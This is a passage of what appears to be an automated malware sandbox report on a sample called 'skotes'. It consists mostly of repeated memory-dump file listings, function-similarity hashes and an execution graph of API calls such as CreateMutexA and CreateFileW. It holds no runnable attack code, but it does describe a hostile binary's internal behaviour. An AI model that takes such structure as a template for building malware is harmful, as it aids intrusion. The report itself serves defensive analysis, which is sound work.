                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 679e00ae720632ccc4343e5c293b3654061b6678d462c6b02ad16154ec183afa
                                                                                                                                                                • Instruction ID: 9744fdb341304bd62c2767d05f8bbf16ced54e1c31c80a13d82028395519875e
                                                                                                                                                                • Opcode Fuzzy Hash: 679e00ae720632ccc4343e5c293b3654061b6678d462c6b02ad16154ec183afa
                                                                                                                                                                • Instruction Fuzzy Hash: FD2149326042009BFB18BB68DC8977DB7E2DBD1310F2446AAE448D76E0CB75A980C362
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 57040152-0
                                                                                                                                                                • Opcode ID: ba02cf42efdb50bba720da3dcc3c5198f820d3355a3b35de5daa03d6310dce39
                                                                                                                                                                • Instruction ID: 479942cec0709f1bc4d82de2cc2f664afcf6444646442ed74ecc6295583c01ea
                                                                                                                                                                • Opcode Fuzzy Hash: ba02cf42efdb50bba720da3dcc3c5198f820d3355a3b35de5daa03d6310dce39
                                                                                                                                                                • Instruction Fuzzy Hash: 9EA1C1B0A052059FDF11EF65C948B5ABBF8FF15B10F0481BAE815D72A1EB35EA04CB91
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                • Instruction ID: 5f3d30ab04bd70401d27262421f5984d25a5ca766789051c56856d9e2c24de20
                                                                                                                                                                • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                • Instruction Fuzzy Hash: 2DB1F2329046469FDB15CF28C881BFEBFE5EF55340F1481EAE855EB242D6B49D01CBA0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 531285432-0
                                                                                                                                                                • Opcode ID: e1c45c9dc316a54ae35defc37cb427f3777ab067037c4f36381e4a8f1e2a877e
                                                                                                                                                                • Instruction ID: 592f2f7214de587e357e006ea6b28f9e90db438ae3c0b7f788d8437b7c4a2a1a
                                                                                                                                                                • Opcode Fuzzy Hash: e1c45c9dc316a54ae35defc37cb427f3777ab067037c4f36381e4a8f1e2a877e
                                                                                                                                                                • Instruction Fuzzy Hash: E3213175A01119AFDF00EFA4DD81EBEBBB9EF08710F1000A5F501B7291DB309D059BA0

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:6.8%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:7.2%
                                                                                                                                                                Total number of Nodes:1145
                                                                                                                                                                Total number of Limit Nodes:120
                                                                                                                                                                execution_graph 37165 b8a418 GetFileAttributesA 37167 b8a428 Concurrency::details::LockQueueNode::DerefTimerNode 37165->37167 37166 b8a93f 37184 bb6c6a 37166->37184 37167->37166 37168 b8a4f3 Concurrency::details::LockQueueNode::DerefTimerNode 37167->37168 37187 b980c0 37168->37187 37170 b8a944 37172 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37170->37172 37174 b8a949 37172->37174 37173 b8a903 37175 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37174->37175 37176 b8a94e 37175->37176 37177 b8a953 Sleep CreateMutexA 37176->37177 37178 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37176->37178 37181 b8a98e 37177->37181 37178->37177 37180 b8a9a7 37181->37180 37182 bb6629 GetPEB GetPEB RtlAllocateHeap 37181->37182 37183 b8a9b0 37182->37183 37202 bb6bf6 RtlAllocateHeap __dosmaperr ___std_exception_copy 37184->37202 37186 bb6c79 ___std_exception_copy 37190 b980de __InternalCxxFrameHandler 37187->37190 37192 b98104 37187->37192 37188 b981ee 37211 b99270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37188->37211 37190->37173 37191 b981f3 37212 b82480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected 37191->37212 37192->37188 37194 b98158 37192->37194 37195 b9817d 37192->37195 37194->37191 37203 b9d3e2 37194->37203 37198 b9d3e2 ListArray 2 API calls 37195->37198 37200 b98169 std::_Rethrow_future_exception 37195->37200 37196 b981f8 37198->37200 37199 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37199->37188 37200->37199 37201 b981d0 Concurrency::details::LockQueueNode::DerefTimerNode 37200->37201 37201->37173 37202->37186 37206 b9d3e7 ListArray 37203->37206 37205 b9d401 37205->37200 37206->37205 37207 b82480 Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected 37206->37207 37213 bb8be1 37206->37213 37208 b9d40d Concurrency::details::_Condition_variable::wait_for CallUnexpected 37207->37208 37219 bb38af RtlAllocateHeap RtlAllocateHeap Concurrency::details::_TaskCollection::_FullAliasWait std::exception_ptr::~exception_ptr ___std_exception_copy 37207->37219 37210 b824c3 37210->37200 37212->37196 37218 bbb04b ListArray _unexpected 37213->37218 37214 bbb089 37220 bb75f6 37214->37220 37216 bbb074 RtlAllocateHeap 37217 bbb087 37216->37217 37216->37218 37217->37206 37218->37214 37218->37216 37219->37210 37223 bba7c8 RtlAllocateHeap _unexpected ___free_lconv_mon 37220->37223 37222 bb75fb 37222->37217 37223->37222 37224 bb6dda 37225 bb6de8 37224->37225 37226 bb6df6 37224->37226 37228 bb6e4c 9 API calls 37225->37228 37237 bb698d 37226->37237 37230 bb6df2 37228->37230 37229 bb6e10 37240 bb68ed 37229->37240 37234 bb6e24 37235 bb6e46 37234->37235 37266 bbadf5 37234->37266 37270 bb690a 37237->37270 37239 bb699f __wsopen_s 37239->37229 37281 bb683b 37240->37281 37243 bb6e4c 37244 bb6e5a 37243->37244 37245 bb6e77 Mailbox 37243->37245 37319 bb75e3 RtlAllocateHeap __dosmaperr 37244->37319 37249 bb6eb9 CreateFileW 37245->37249 37250 bb6e9d 37245->37250 37247 bb6e5f 37248 bb75f6 __dosmaperr RtlAllocateHeap 37247->37248 37253 bb6e67 37248->37253 37251 bb6eeb 37249->37251 37252 bb6edd 37249->37252 37321 bb75e3 RtlAllocateHeap __dosmaperr 37250->37321 37323 bb6f2a GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __dosmaperr 37251->37323 37298 bb6fb4 GetFileType 37252->37298 37320 bb6c5a RtlAllocateHeap ___std_exception_copy 37253->37320 37255 bb6ea2 37259 bb75f6 __dosmaperr RtlAllocateHeap 37255->37259 37261 bb6ea9 37259->37261 37260 bb6e72 37260->37234 37322 bb6c5a RtlAllocateHeap ___std_exception_copy 37261->37322 37263 bb6f1c CloseHandle 37264 bb6eb4 37263->37264 37264->37234 37265 bb6ee6 Mailbox 37265->37263 37265->37264 37267 bbae00 37266->37267 37269 bbae1b __dosmaperr 37266->37269 37268 bb75f6 __dosmaperr RtlAllocateHeap 37267->37268 37267->37269 37268->37269 37269->37235 37271 bb692a 37270->37271 37277 bb6921 37270->37277 37271->37277 37278 bba671 3 API calls 3 library calls 37271->37278 37273 bb694a 37279 bbb5fb GetPEB GetPEB RtlAllocateHeap __fassign 37273->37279 37275 bb6960 37280 bbb628 GetPEB GetPEB RtlAllocateHeap __fassign 37275->37280 37277->37239 37278->37273 37279->37275 37280->37277 37282 bb6849 37281->37282 37283 bb6863 37281->37283 37294 bb69cc RtlAllocateHeap ___free_lconv_mon 37282->37294 37285 bb686a 37283->37285 37286 bb6889 __fassign 37283->37286 37288 bb6853 37285->37288 37295 bb69e6 RtlAllocateHeap RtlAllocateHeap __wsopen_s 37285->37295 37291 bb689f __fassign 37286->37291 37297 bb69e6 RtlAllocateHeap RtlAllocateHeap __wsopen_s 37286->37297 37288->37234 37288->37243 37291->37288 37296 bb75c0 RtlAllocateHeap __dosmaperr 37291->37296 37292 bb68ab 37293 bb75f6 __dosmaperr RtlAllocateHeap 37292->37293 37293->37288 37294->37288 37295->37288 37296->37292 37297->37291 37299 bb6fef 37298->37299 37300 bb70a1 37298->37300 37301 bb7009 Mailbox 37299->37301 37338 bb732a RtlAllocateHeap __dosmaperr 37299->37338 37302 bb7098 